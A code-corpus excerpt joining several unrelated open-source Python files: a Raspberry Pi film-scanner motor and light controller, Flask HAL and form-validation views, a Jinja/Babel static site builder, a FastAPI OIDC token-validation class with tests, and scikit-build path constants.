file_path = os.path.join(folder, item[2][0])
print(file_path)
img = nib.load(file_path)
data = img.get_fdata()
#prob = ext.run(image)
prob = process_image(data, _process)
mask = prob > 0.5
print(mask)
print("Next")
cnt = cnt + 1
if cnt == 5:
break
while(True):
pass
#worksForBatch()
```
#### File: Jokubaskaralius/deepbrain/setup.py
```python
import sys
from setuptools import setup
if sys.version_info < (3, 5):
raise NotImplementedError("Sorry, you need at least Python 3.5 to use tfserve.")
def readme():
with open("README.md") as f:
return f.read()
with open("requirements.txt") as f:
required = f.read().splitlines()
setup(name="deepbrain",
version="0.1",
description="Deep Learning-based tools for processing brain images",
long_description=readme(),
long_description_content_type="text/markdown",
author="<NAME>",
author_email="<EMAIL>",
url="http://github.com/iitzco/deepbrain",
keywords="deep-learning machine-learning tensorflow ai",
scripts=["bin/deepbrain-extractor"],
packages=["deepbrain"],
license="MIT",
platforms="any",
install_requires=required, # Automatically download dependencies on requirements.txt
python_requires=">3.5",
classifiers=["Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
include_package_data=True # To include everything in MANIFEST.in
)
``` |
{
"source": "jokubasver/rpi-film-capture",
"score": 3
} |
#### File: server/filmCap/control.py
```python
import time
import RPi.GPIO as GPIO
from timeit import default_timer as timer
import logging
import collections
import multiprocessing
class fcControl():
light_pin = 2
red_pin = 3
yellow_pin = 4
trigger_pin = 14
speed = 100
frame_advance_pct=50 #This is the CUSHION - we advance 100 minus this amt after trigger
def __init__(self):
GPIO.setmode(GPIO.BCM)
self.light = lightControl(self.light_pin, True)
self.redled = lightControl(self.red_pin)
self.yellowled = lightControl(self.yellow_pin)
self.motor = stepperControl()
GPIO.setup(self.trigger_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
self.motorstate = 0
self.smart_motor = False
self.smart_headroom = 25
self.triggertime = 0
self.qlen = 5
self.triggertimes = collections.deque([],self.qlen)
self.phototimes = collections.deque([],self.qlen)
def light_on(self):
self.light.on()
def light_off(self):
self.light.off()
def red_on(self):
self.redled.on()
def red_off(self):
self.redled.off()
def yellow_on(self):
self.yellowled.on()
def yellow_off(self):
self.yellowled.off()
def yellow_is_on(self):
return GPIO.input(self.yellow_pin)
def cleanup(self):
logging.info("Cleaning up GPIO")
self.light.off()
self.redled.off()
self.yellowled.off()
self.motor.stop()
GPIO.cleanup()
def motor_wake(self):
self.motor.wake()
def motor_sleep(self):
self.motor.sleep()
def motor_fwd(self, speed=False):
if (not speed):
speed = self.speed
self.motor.fwd(speed)
self.motorstate = 1
def motor_rev(self, speed=False):
if (not speed):
speed = self.speed
self.motor.rev(speed)
self.motorstate = -1
def motor_stop(self):
self.motor.stop()
self.triggertimes.clear()
self.phototimes.clear()
if self.motorstate:
self.motor.center(self.trigger_pin, self.frame_advance_pct, self.motorstate)
self.motorstate = 0
self.motor.sleep()
def calibrate(self):
self.motor.center(self.trigger_pin, self.frame_advance_pct, 1)
def end_photo(self):
newtime = timer()
phototime = newtime - self.triggertime
self.phototimes.appendleft(phototime)
class lightControl:
def __init__(self, pin, reversed=False):
self.pin = pin
self.reversed = reversed
GPIO.setup(pin, GPIO.OUT)
self.off()
def on(self):
GPIO.output( self.pin, not(self.reversed) )
def off(self):
GPIO.output( self.pin, self.reversed )
class stepperControl:
pulse_freq = 1000
#stepper motor control pins
dir_pin = 18
ms1_pin = 22
ms2_pin = 24
sleep_pin = 21
reset_pin = 15
pulse_pin = 25
half_pulse = .001 #for frame advance
steps_per_rev = 200 #also change for MotorDriver class below
def __init__(self):
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.dir_pin, GPIO.OUT)
GPIO.setup(self.pulse_pin, GPIO.OUT)
GPIO.setup(self.ms1_pin, GPIO.OUT)
GPIO.setup(self.ms2_pin, GPIO.OUT)
GPIO.setup(self.sleep_pin, GPIO.OUT)
GPIO.setup(self.reset_pin, GPIO.OUT)
dir=False
GPIO.output(self.dir_pin, dir)
GPIO.output(self.pulse_pin, False)
GPIO.output(self.ms1_pin, False)
GPIO.output(self.ms2_pin, False)
GPIO.output(self.sleep_pin, False)
GPIO.output(self.reset_pin, True)
self.p1 = GPIO.PWM(self.pulse_pin, self.pulse_freq)
def wake(self):
GPIO.output(self.sleep_pin, True)
logging.debug("motor waking")
time.sleep(.1)
def sleep(self):
GPIO.output(self.sleep_pin, False)
logging.debug("motor sleeping")
time.sleep(.1)
def stop(self):
self.p1.stop()
GPIO.output(self.dir_pin, False)
def fwd(self, speed=100):
self.wake()
self.p1.stop()
time.sleep(.5)
self.p1.ChangeFrequency(self.pulse_freq*speed/100)
logging.debug(self.pulse_freq*speed/100)
GPIO.output(self.dir_pin, False)
logging.debug("motor starting fwd")
self.p1.start(20)
def rev(self, speed=100):
self.wake()
self.p1.stop()
time.sleep(.5)
self.p1.ChangeFrequency(self.pulse_freq*speed/100)
GPIO.output(self.dir_pin, True)
logging.debug("motor starting rev")
self.p1.start(20)
def fwdFrame(self, num=1):
self.wake()
logging.debug("fwdFrame "+str(num))
self.windFrame(num)
self.sleep()
def windFrame(self, num=1):
pin=self.pulse_pin #directly accessing for speed
hp=self.half_pulse
for i in range (0,int(self.steps_per_rev*num)):
GPIO.output(pin, True) #used instead of variable for speed
time.sleep(hp) #again, directly entering num for speed
GPIO.output(pin, False) #used instead of variable for speed
time.sleep(hp)
def revFrame(self, num=1): #winds back one more than necessary, then forward to properly frame
logging.debug("revFrame "+str(num))
self.wake()
if num==1:
GPIO.output(self.dir_pin, True)
self.windFrame()
GPIO.output(self.dir_pin, False)
else:
GPIO.output(self.dir_pin, True)
self.windFrame(num+1)
GPIO.output(self.dir_pin, False)
time.sleep(.25)
self.windFrame(1)
self.sleep()
def center(self, trigger_pin, pct, fromState):
#to center a frame in the gate and position the projector
#mechanism properly relative to the photo trigger (i.e. 'pct'
#distance ahead of it. Winding film backwards doesn't position
#correctly, so we need to bump ahead a frame to position after
#rewinding
while GPIO.input(trigger_pin): #if trigger is engaged, wind FORWARD (not reverse) until it's not
GPIO.output(self.dir_pin, False) #True)
GPIO.output(self.pulse_pin, True)
time.sleep(.001)
GPIO.output(self.pulse_pin, False)
time.sleep(.001)
time.sleep(.2)
while not GPIO.input(trigger_pin): #then forward until it is
GPIO.output(self.dir_pin, False)
GPIO.output(self.pulse_pin, True)
time.sleep(.001)
GPIO.output(self.pulse_pin, False)
time.sleep(.001)
if fromState==-1: #if we had been reversing, jump forward a frame
self.windFrame(1)
logging.debug("Winding 1 frame")
stepsFwd=int(self.steps_per_rev*(100-pct)/100.0)
GPIO.output(self.dir_pin, False)
time.sleep(.01)
logging.debug("Forward "+str(stepsFwd))
for i in range(0,stepsFwd): #now forward enough to leave a proper cushion
GPIO.output(self.pulse_pin, True)
time.sleep(.001)
GPIO.output(self.pulse_pin, False)
time.sleep(.001)
class MotorDriver(multiprocessing.Process):
#a very simple class designed to stick frame-advance in another
#process during captures, so a different core can handle it and it
#won't delay photography - or vice versa
pulse_pin = 25
half_pulse = .0008
steps_per_rev = 200
def __init__(self, cap_event, exit_event):
super(MotorDriver, self).__init__()
self.cap_event=cap_event
self.exit_event=exit_event
logging.debug("MotorDriverInit")
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.pulse_pin, GPIO.OUT)
def run(self):
logging.debug("Motor Frame Advance Process running")
try:
while not self.exit_event.is_set():
if self.cap_event.wait(2):
self.fwdFrame(1)
except KeyboardInterrupt:
logging.debug("Motor Process killed via kbd")
finally:
logging.debug("Motor Frame Advance Process ending")
def fwdFrame(self, num=1):
pin=self.pulse_pin
hp=self.half_pulse
logging.debug("Fframe")
for i in range (0,int(self.steps_per_rev*num)):
GPIO.output(pin, True) #used instead of variable for speed
time.sleep(hp) #again, directly entering num for speed
GPIO.output(pin, False) #used instead of variable for speed
time.sleep(hp)
self.cap_event.clear()
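# Hedged usage sketch (not part of the original module): the capture code sets
# cap_event after each photo and this process advances one frame on its own
# core; exit_event ends the loop.
#
# cap_event = multiprocessing.Event()
# exit_event = multiprocessing.Event()
# driver = MotorDriver(cap_event, exit_event)
# driver.start()
# cap_event.set()   # request a one-frame advance after a capture
# exit_event.set()  # shut the process down
# driver.join()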
``` |
{
"source": "jokull/flask-halalchemy",
"score": 2
} |
#### File: jokull/flask-halalchemy/flask_halalchemy.py
```python
from flask import request, url_for, current_app, make_response
from flask.helpers import json
from flask.views import MethodView
from werkzeug.utils import cached_property
from dictshield.base import ShieldDocException
from dictshield.document import Document
_error_response_headers = {'Content-Type': 'application/json'}
class FormView(MethodView):
"""
Validates form API requests. Subclass and add the form fields you wish to
validate against. PATCH validates partial updates whereas POST validates
that all required fields are present.
`fields` is a mapping of exposed field names and dictshield The values are
instances of `dictshield.fields.BaseField` to validate against.
"""
fields = {}
validate_on_methods = ['POST', 'PATCH', 'PUT']
def __init__(self, document=None):
if document is None:
cls_name = self.__class__.__name__ + "Document"
self.document = type(cls_name, (Document, ), self.fields)
else:
if not issubclass(document, Document):
raise TypeError("Form documents must be instances of `dictshield.document.Document`")
self.document = document
@cached_property
def data(self):
return request.json or request.form.to_dict()
@cached_property
def clean(self):
return self.document.make_ownersafe(self.document(**self.data).to_python())
def validate(self):
"""
Sets an error attribute with a `field_name`: message dictionary.
Returns `True` if valid and `False` if `errors` is non-empty.
For some fucked up reason dictshield has completely different ways to
validate partial and object integrity updates.
"""
if request.method == "PATCH":
# Allow partial documents when PATCH’ing
validate = self.document.validate_class_partial
self.errors = validate(self.data, validate_all=True)
else:
try:
self.document(**self.data).validate(validate_all=True)
except ShieldDocException as e:
self.errors = e.error_list
else:
self.errors = None
return not bool(self.errors)
def error_response(self):
"""
Return a basic application/json response with status code 422 to inform
the consumer of validation errors in the form request.
"""
errors = dict([(e.field_name, e.reason) for e in self.errors]) # TODO what about multiple errors per field
content = json.dumps(dict(message="Validation error", errors=errors))
return make_response(content, 422, _error_response_headers)
def dispatch_request(self, *args, **kwargs):
if request.method in self.validate_on_methods and not self.validate():
return self.error_response()
return super(FormView, self).dispatch_request(*args, **kwargs)
def schema_response(self):
"""Return a schema+json response for the document. """
return self.document.to_jsonschema(), 200, {
'Content-Type': 'application/schema+json',
'Accept': 'application/json; charset=utf-8'}
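# Hedged usage sketch (the view and field names below are hypothetical, and a
# Flask app object named app is assumed): a subclass lists dictshield fields,
# implements the HTTP methods, and lets dispatch_request() reply with the 422
# error response when validation fails.
#
# from dictshield.fields import StringField
#
# class SignupView(FormView):
#     fields = {'email': StringField(required=True)}
#
#     def post(self):
#         return json.dumps(self.clean), 201, {'Content-Type': 'application/json'}
#
# app.add_url_rule('/signup', view_func=SignupView.as_view('signup'), methods=['POST'])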
class QueryView(MethodView):
"""
Add `url_kwargs` to the view class instance. The HTTP method class methods
do *not* receive the args and kwargs from the Route.
"""
def dispatch_request(self, *args, **kwargs):
self.url_kwargs = kwargs
return super(QueryView, self).dispatch_request()
class ResourceView(QueryView):
content_type = 'application/hal+json'
def get_url(self):
if hasattr(self, "url"):
return self.url
return request.path
def links(self):
links = [{'self': {'href': self.get_url()}}]
if callable(getattr(self.query(), "links", None)):
links += self.query().links()
return links
@property
def json(self):
return dict(_links=self.links(), **self.query().json)
def get(self):
return json.dumps(self.json), 200, {'Content-Type': self.content_type}
@classmethod
def as_resource(cls, endpoint, model_instance=None):
# Instantiate from endpoint and object. Traverse the app url_map and
# find a best match for the subresource URL.
def get_url_kwargs():
for rule in current_app.url_map._rules_by_endpoint[endpoint]:
if 'GET' in rule.methods and rule.arguments:
for arg in rule.arguments:
if hasattr(model_instance, arg):
yield arg, getattr(model_instance, arg)
raise StopIteration()
self = cls()
self.url_kwargs = dict(get_url_kwargs())
self.url = url_for(endpoint, **self.url_kwargs)
if model_instance is not None:
# Avoid n+1 querying by settings `query` to the instance
self.query = lambda: model_instance
return self
class IndexView(QueryView):
"""
Paginated resources. Uses `?page=<int>` URL argument. Route this view like
so:
workout_resource = ResourceView.as_view(Workout, 'workout')
workout_index = IndexView.as_view(Workout, 'workouts', resource=workout_resource)
app.add_url_rule('/workouts/<int:id>', workout_resource, methods=['GET'])
app.add_url_rule('/workouts', workout_index, methods=['GET'])
Notice that a `workout_resource` was created first. This is cleaner since
HAL embeds subresources and we can generate a HAL compliant structure for
this index.
It might be a good idea to order to `query` to get predictable results.
"""
content_type = 'application/hal+json'
per_page = 40
def __init__(self, subresource_endpoint=None):
self.subresource_endpoint = subresource_endpoint
@property
def json(self):
return {'total': self.page.total, 'per_page': self.page.per_page}
def query(self):
raise NotImplementedError()
def links(self):
view_name = request.url_rule.endpoint
_links = {'self': {'href': url_for(view_name)}}
if self.page.pages > 0:
if self.page.page == self.page.pages:
_links['last'] = _links['self']
else:
_links['last'] = {'href': url_for(view_name, page=self.page.pages)}
if self.page.has_next:
_links['next'] = {'href': url_for(view_name, page=self.page.next_num)}
if self.page.has_prev:
_links['previous'] = {'href': url_for(view_name, page=self.page.prev_num)}
return _links
def embedded(self):
endpoint = self.subresource_endpoint
if endpoint is None:
get_json = lambda o: o.json
else:
resource = current_app.view_functions[endpoint].view_class
get_json = lambda o: resource.as_resource(endpoint, o).json
return [get_json(item) for item in self.page.items]
def get(self):
page_num = int(request.args.get('page', 1))
per_page = int(request.args.get('per_page', self.per_page))
per_page = min(per_page, self.per_page) # Upper limit
self.page = self.query().paginate(page_num, per_page=per_page)
content = json.dumps(dict(
_embedded={request.url_rule.endpoint: self.embedded()},
_links=self.links(), **self.json))
return content, 200, {'Content-Type': self.content_type}
``` |
{
"source": "jokull/jinjet",
"score": 2
} |
#### File: jokull/jinjet/jinjet.py
```python
import os, argparse, sys, time
from threading import local
from jinja2 import TemplateNotFound, FileSystemLoader, Environment
# this is a workaround for a snow leopard bug that babel does not
# work around :)
if os.environ.get('LC_CTYPE', '').lower() == 'utf-8':
os.environ['LC_CTYPE'] = 'en_US.utf-8'
from datetime import datetime
from babel import dates, numbers, support, Locale
from babel.messages.frontend import parse_mapping
from babel.util import pathmatch
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
_language = None
_active = local()
def activate_locale(locale):
_active.value = locale
def get_locale():
return _active.value
def get_translations():
"""Returns the correct gettext translations that should be used for
this request. This will never fail and return a dummy translation
object if used outside of the request or if a translation cannot be
found.
"""
translations = support.Translations.load(cli.catalog, [get_locale()])
return translations
def gettext(string, **variables):
"""Translates a string with the current locale and passes in the
given keyword arguments as mapping to a string formatting string.
::
gettext(u'Hello World!')
gettext(u'Hello %(name)s!', name='World')
"""
t = get_translations()
if t is None:
return string % variables
return t.ugettext(string) % variables
_ = gettext
def ngettext(singular, plural, num, **variables):
"""Translates a string with the current locale and passes in the
given keyword arguments as mapping to a string formatting string.
The `num` parameter is used to dispatch between singular and various
plural forms of the message. It is available in the format string
as ``%(num)d`` or ``%(num)s``. The source language should be
English or a similar language which only has one plural form.
::
ngettext(u'%(num)d Apple', u'%(num)d Apples', num=len(apples))
"""
variables.setdefault('num', num)
t = get_translations()
if t is None:
return (singular if num == 1 else plural) % variables
return t.ungettext(singular, plural, num) % variables
def pgettext(context, string, **variables):
"""Like :func:`gettext` but with a context.
"""
t = get_translations()
if t is None:
return string % variables
return t.upgettext(context, string) % variables
def npgettext(context, singular, plural, num, **variables):
"""Like :func:`ngettext` but with a context.
"""
variables.setdefault('num', num)
t = get_translations()
if t is None:
return (singular if num == 1 else plural) % variables
return t.unpgettext(context, singular, plural, num) % variables
def get_locales():
"""Returns a list of all the locales translations exist for. The
list returned will be filled with actual locale objects and not just
strings. A no-op translation is added for the `default_locale`.
"""
baselocale = Locale.parse(cli.baselocale)
result = {baselocale.language: baselocale}
if not os.path.isdir(cli.catalog):
return result
for folder in os.listdir(cli.catalog):
locale_dir = os.path.join(cli.catalog, folder, 'LC_MESSAGES')
if not os.path.isdir(locale_dir):
continue
if folder in result and cli.verbose:
print "Warning: Translation found for the base locale [{}]".format(folder)
if filter(lambda x: x.endswith('.mo'), os.listdir(locale_dir)):
locale = Locale.parse(folder)
result[locale.language] = locale
return result.values()
def write_template(name, folder=None, context={}):
target = cli.output
if folder:
target = os.path.join(target, folder)
if not os.path.isdir(target):
os.makedirs(target)
with open(os.path.join(target, name), 'w') as fp:
template = env.get_template(name)
fp.write(template.render(**context).encode('utf-8'))
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action='count')
parser.add_argument('--output', '-o', default='public/')
parser.add_argument('--catalog', '-c', default='translations/')
parser.add_argument('--templates', '-t', default='app/assets/')
parser.add_argument('--babelconf', '-b', default='babel.cfg')
parser.add_argument('--baselocale', default='en')
parser.add_argument('--watch', '-w', action='store_true')
cli = parser.parse_args()
def guess_autoescape(template_name):
if template_name is None or '.' not in template_name:
return False
ext = template_name.rsplit('.', 1)[1]
return ext in ('html', 'htm', 'xml')
env = Environment(autoescape=guess_autoescape,
loader=FileSystemLoader(cli.templates),
extensions=['jinja2.ext.autoescape', 'jinja2.ext.i18n'])
env.install_gettext_callables(
lambda x: get_translations().ugettext(x),
lambda s, p, n: get_translations().ungettext(s, p, n),
newstyle=True
)
def build():
try:
mappings, _ = parse_mapping(open(cli.babelconf))
except IOError:
sys.exit("Could not find Babel conf ({0})".format(cli.babelconf))
search_paths = [search_path for (search_path, _) in mappings]
    def is_template(name):
        full_name = os.path.join(cli.templates, name)
        for path in search_paths:
            if pathmatch(path, full_name):
                return True
        return False
locales = get_locales()
context = dict(
locales=locales,
)
for locale in locales:
activate_locale(locale)
if cli.verbose:
print "Processing locale:", get_locale()
for name in env.list_templates():
if not is_template(name):
continue
folder = get_locale().language
if cli.verbose > 1:
print "Writing template: ", name
context = dict(context,
now=datetime.now(),
current_locale=get_locale()
)
write_template(name, folder, context)
def main():
class ChangeHandler(FileSystemEventHandler):
def on_any_event(self, event):
if event.is_directory:
return
print "Template update detected"
build()
build()
if cli.watch:
event_handler = ChangeHandler()
observer = Observer()
observer.schedule(event_handler, cli.templates, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
``` |
{
"source": "jokurz/fastapi-third-party-auth",
"score": 2
} |
#### File: fastapi-third-party-auth/fastapi_third_party_auth/auth.py
```python
from typing import List
from typing import Optional
from typing import Type
from fastapi import Depends
from fastapi import HTTPException
from fastapi import Request
from fastapi import status
from fastapi.openapi.models import OAuthFlowAuthorizationCode
from fastapi.openapi.models import OAuthFlowClientCredentials
from fastapi.openapi.models import OAuthFlowImplicit
from fastapi.openapi.models import OAuthFlowPassword
from fastapi.openapi.models import OAuthFlows
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.security import HTTPBearer
from fastapi.security import OAuth2
from fastapi.security import SecurityScopes
from jose import ExpiredSignatureError
from jose import JWTError
from jose import jwt
from jose.exceptions import JWTClaimsError
from fastapi_third_party_auth import discovery
from fastapi_third_party_auth.grant_types import GrantType
from fastapi_third_party_auth.idtoken_types import IDToken
class Auth(OAuth2):
def __init__(
self,
openid_connect_url: str,
issuer: Optional[str] = None,
client_id: Optional[str] = None,
scopes: List[str] = list(),
grant_types: List[GrantType] = [GrantType.IMPLICIT],
signature_cache_ttl: int = 3600,
idtoken_model: Type[IDToken] = IDToken,
):
"""Configure authentication :func:`auth = Auth(...) <Auth>` and then:
1. Show authentication in the interactive docs with :func:`Depends(auth) <Auth>`
when setting up FastAPI.
2. Use :func:`Security(auth.required) <Auth.required>` or
:func:`Security(auth.optional) <Auth.optional>` in your endpoints to
check user credentials.
Args:
openid_connect_url (URL): URL to the "well known" openid connect config
e.g. https://dev-123456.okta.com/.well-known/openid-configuration
issuer (URL): (Optional) The issuer URL from your auth server.
client_id (str): (Optional) The client_id configured by your auth server.
            scopes (List[str]): (Optional) A list of scopes that every token must include.
grant_types (List[GrantType]): (Optional) Grant types shown in docs.
signature_cache_ttl (int): (Optional) How many seconds your app should
cache the authorization server's public signatures.
idtoken_model (Type): (Optional) The model to use for validating the ID Token.
Raises:
Nothing intentional
"""
self.openid_connect_url = openid_connect_url
self.issuer = issuer
self.client_id = client_id
self.idtoken_model = idtoken_model
self.scopes = scopes
self.discover = discovery.configure(cache_ttl=signature_cache_ttl)
oidc_discoveries = self.discover.auth_server(
openid_connect_url=self.openid_connect_url
)
# scopes_dict = {
# scope: "" for scope in self.discover.supported_scopes(oidc_discoveries)
# }
flows = OAuthFlows()
if GrantType.AUTHORIZATION_CODE in grant_types:
flows.authorizationCode = OAuthFlowAuthorizationCode(
authorizationUrl=self.discover.authorization_url(oidc_discoveries),
tokenUrl=self.discover.token_url(oidc_discoveries),
# scopes=scopes_dict,
)
if GrantType.CLIENT_CREDENTIALS in grant_types:
flows.clientCredentials = OAuthFlowClientCredentials(
tokenUrl=self.discover.token_url(oidc_discoveries),
# scopes=scopes_dict,
)
if GrantType.PASSWORD in grant_types:
flows.password = OAuthFlowPassword(
tokenUrl=self.discover.token_url(oidc_discoveries),
# scopes=scopes_dict,
)
if GrantType.IMPLICIT in grant_types:
flows.implicit = OAuthFlowImplicit(
authorizationUrl=self.discover.authorization_url(oidc_discoveries),
# scopes=scopes_dict,
)
super().__init__(
scheme_name="OIDC",
flows=flows,
auto_error=False,
)
async def __call__(self, request: Request) -> None:
return None
def required(
self,
security_scopes: SecurityScopes,
authorization_credentials: Optional[HTTPAuthorizationCredentials] = Depends(
HTTPBearer()
),
) -> IDToken:
"""Validate and parse OIDC ID token against configuration.
Note this function caches the signatures and algorithms of the issuing
server for signature_cache_ttl seconds.
Args:
security_scopes (SecurityScopes): Security scopes
            authorization_credentials (HTTPAuthorizationCredentials): The bearer
                token, extracted and injected behind the scenes by Depends.
Return:
IDToken (self.idtoken_model): User information
raises:
HTTPException(status_code=401, detail=f"Unauthorized: {err}")
IDToken validation errors
"""
id_token = self.authenticate_user(
security_scopes,
authorization_credentials,
auto_error=True,
)
if id_token is None:
raise HTTPException(status.HTTP_401_UNAUTHORIZED)
else:
return id_token
def optional(
self,
security_scopes: SecurityScopes,
authorization_credentials: Optional[HTTPAuthorizationCredentials] = Depends(
HTTPBearer(auto_error=False)
),
) -> Optional[IDToken]:
"""Optionally validate and parse OIDC ID token against configuration.
Will not raise if the user is not authenticated. Note this function
caches the signatures and algorithms of the issuing server for
signature_cache_ttl seconds.
Args:
security_scopes (SecurityScopes): Security scopes
            authorization_credentials (HTTPAuthorizationCredentials): The bearer
                token, extracted and injected behind the scenes by Depends.
Return:
IDToken (self.idtoken_model): User information
raises:
IDToken validation errors
"""
return self.authenticate_user(
security_scopes,
authorization_credentials,
auto_error=False,
)
def authenticate_user(
self,
security_scopes: SecurityScopes,
authorization_credentials: Optional[HTTPAuthorizationCredentials],
auto_error: bool,
) -> Optional[IDToken]:
"""Validate and parse OIDC ID token against against configuration.
Note this function caches the signatures and algorithms of the issuing server
for signature_cache_ttl seconds.
Args:
security_scopes (SecurityScopes): Security scopes
            authorization_credentials (HTTPAuthorizationCredentials): The bearer token
auto_error (bool): If True, will raise an HTTPException if the user
is not authenticated.
Return:
IDToken (self.idtoken_model): User information
raises:
HTTPException(status_code=401, detail=f"Unauthorized: {err}")
"""
if (
authorization_credentials is None
or authorization_credentials.scheme.lower() != "bearer"
):
if auto_error:
raise HTTPException(
status.HTTP_401_UNAUTHORIZED, detail="Missing bearer token"
)
else:
return None
oidc_discoveries = self.discover.auth_server(
openid_connect_url=self.openid_connect_url
)
key = self.discover.public_keys(oidc_discoveries)
algorithms = self.discover.signing_algos(oidc_discoveries)
try:
id_token = jwt.decode(
authorization_credentials.credentials,
key,
algorithms,
issuer=self.issuer,
audience=self.client_id,
options={
# Disabled at_hash check since we aren't using the access token
"verify_at_hash": False,
"verify_iss": self.issuer is not None,
"verify_aud": self.client_id is not None,
},
)
            if (
                isinstance(id_token["aud"], list)
                and len(id_token["aud"]) >= 1
                and "azp" not in id_token
            ):
raise JWTError(
'Missing authorized party "azp" in IDToken when there '
"are multiple audiences"
)
except (ExpiredSignatureError, JWTError, JWTClaimsError) as error:
raise HTTPException(status_code=401, detail=f"Unauthorized: {error}")
expected_scopes = set(self.scopes + security_scopes.scopes)
token_scopes = id_token.get("scope", "").split(" ")
if not expected_scopes.issubset(token_scopes):
            raise HTTPException(
                status.HTTP_401_UNAUTHORIZED,
                detail=(
                    f"Missing scope token, expected {expected_scopes} to be a "
                    f"subset of received {token_scopes}"
                ),
            )
return self.idtoken_model(**id_token)
```
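The `Auth` docstring above describes wiring the scheme into FastAPI with `Depends` and `Security`; the following sketch shows one plausible setup. The OIDC discovery URL, route paths, and the use of the `sub` claim (assuming the default `IDToken` model exposes it) are placeholders, not taken from the library's documentation.
```python
# Hypothetical FastAPI wiring for the Auth class above; the discovery URL,
# route paths and returned claims are placeholders.
from fastapi import Depends, FastAPI, Security

from fastapi_third_party_auth import Auth
from fastapi_third_party_auth.idtoken_types import IDToken

auth = Auth(openid_connect_url="https://example.okta.com/.well-known/openid-configuration")

app = FastAPI(dependencies=[Depends(auth)])  # shows the OIDC scheme in the interactive docs


@app.get("/protected")
def protected(id_token: IDToken = Security(auth.required)):
    # auth.required raises a 401 unless a valid bearer token is presented
    return {"subject": id_token.sub}


@app.get("/maybe-protected")
def maybe_protected(id_token: IDToken = Security(auth.optional)):
    # auth.optional returns None for anonymous callers instead of raising
    return {"authenticated": id_token is not None}
```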
#### File: fastapi-third-party-auth/tests/test_auth.py
```python
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.security import SecurityScopes
import fastapi_third_party_auth
from fastapi_third_party_auth import Auth
from fastapi_third_party_auth.idtoken_types import IDToken
def test__authenticate_user(
monkeypatch,
mock_discovery,
token_with_audience,
config_w_aud,
test_email,
):
monkeypatch.setattr(
fastapi_third_party_auth.auth.discovery, "configure", mock_discovery
)
token = token_with_audience
auth = Auth(**config_w_aud)
id_token = auth.required(
security_scopes=SecurityScopes(scopes=[]),
authorization_credentials=HTTPAuthorizationCredentials(
scheme="Bearer", credentials=token
),
)
assert id_token.email == test_email # nosec
assert id_token.aud == config_w_aud["client_id"]
def test__authenticate_user_no_aud(
monkeypatch,
mock_discovery,
token_without_audience,
no_audience_config,
test_email,
):
monkeypatch.setattr(
fastapi_third_party_auth.auth.discovery, "configure", mock_discovery
)
token = token_without_audience
auth = Auth(**no_audience_config)
id_token = auth.required(
security_scopes=SecurityScopes(scopes=[]),
authorization_credentials=HTTPAuthorizationCredentials(
scheme="Bearer", credentials=token
),
)
assert id_token.email == test_email # nosec
def test__authenticate_user_returns_custom_tokens(
monkeypatch, mock_discovery, token_without_audience, no_audience_config
):
class CustomToken(IDToken):
custom_field: str = "OnlySlightlyBent"
monkeypatch.setattr(
fastapi_third_party_auth.auth.discovery, "configure", mock_discovery
)
token = token_without_audience
auth = Auth(
**no_audience_config,
idtoken_model=CustomToken,
)
custom_token = auth.required(
security_scopes=SecurityScopes(scopes=[]),
authorization_credentials=HTTPAuthorizationCredentials(
scheme="Bearer", credentials=token
),
)
assert custom_token.custom_field == "OnlySlightlyBent"
``` |
{
"source": "jokva/scikit-build",
"score": 2
} |
#### File: scikit-build/skbuild/constants.py
```python
import os
import sys
from distutils.util import get_platform
CMAKE_DEFAULT_EXECUTABLE = "cmake"
"""Default path to CMake executable."""
_SKBUILD_PLAT_NAME = get_platform()
def set_skbuild_plat_name(plat_name):
"""Set platform name associated with scikit-build functions returning a path:
* :func:`SKBUILD_DIR()`
* :func:`SKBUILD_MARKER_FILE()`
* :func:`CMAKE_BUILD_DIR()`
* :func:`CMAKE_INSTALL_DIR()`
* :func:`CMAKE_SPEC_FILE()`
* :func:`SETUPTOOLS_INSTALL_DIR()`
"""
global _SKBUILD_PLAT_NAME
_SKBUILD_PLAT_NAME = plat_name
def skbuild_plat_name():
"""Get platform name.
Default value corresponds to :func:`distutils.util.get_platform()` and can be overridden
with :func:`set_skbuild_plat_name()`.
"""
return _SKBUILD_PLAT_NAME
def SKBUILD_DIR():
"""Top-level directory where setuptools and CMake directories are generated."""
return os.path.join(
"_skbuild",
"{}-{}".format(_SKBUILD_PLAT_NAME, '.'.join(map(str, sys.version_info[:2]))),
)
def SKBUILD_MARKER_FILE():
"""Marker file used by :func:`skbuild.command.generate_source_manifest.generate_source_manifest.run()`."""
return os.path.join(SKBUILD_DIR(), "_skbuild_MANIFEST")
def CMAKE_BUILD_DIR():
"""CMake build directory."""
return os.path.join(SKBUILD_DIR(), "cmake-build")
def CMAKE_INSTALL_DIR():
"""CMake install directory."""
return os.path.join(SKBUILD_DIR(), "cmake-install")
def CMAKE_SPEC_FILE():
"""CMake specification file storing CMake version, CMake configuration arguments and
environment variables ``PYTHONNOUSERSITE`` and ``PYTHONPATH``.
"""
return os.path.join(CMAKE_BUILD_DIR(), "CMakeSpec.json")
def SETUPTOOLS_INSTALL_DIR():
"""Setuptools install directory."""
return os.path.join(SKBUILD_DIR(), "setuptools")
```
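A quick illustration of what the helpers above resolve to; the platform tag and Python version shown in the comments are examples only and depend on the running interpreter.
```python
# Illustrative only: actual values depend on the interpreter and platform in use.
from skbuild.constants import (
    CMAKE_BUILD_DIR,
    CMAKE_INSTALL_DIR,
    SKBUILD_DIR,
    set_skbuild_plat_name,
)

set_skbuild_plat_name("linux-x86_64")  # override the distutils-detected platform

print(SKBUILD_DIR())        # e.g. _skbuild/linux-x86_64-3.9
print(CMAKE_BUILD_DIR())    # e.g. _skbuild/linux-x86_64-3.9/cmake-build
print(CMAKE_INSTALL_DIR())  # e.g. _skbuild/linux-x86_64-3.9/cmake-install
```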
#### File: scikit-build/tests/test_hello_pure.py
```python
import glob
import tarfile
from skbuild.constants import SKBUILD_DIR
from skbuild.utils import push_dir
from zipfile import ZipFile
from . import check_wheel_content, project_setup_py_test
@project_setup_py_test("hello-pure", ["build"], disable_languages_test=True)
def test_hello_pure_builds(capsys):
out, _ = capsys.readouterr()
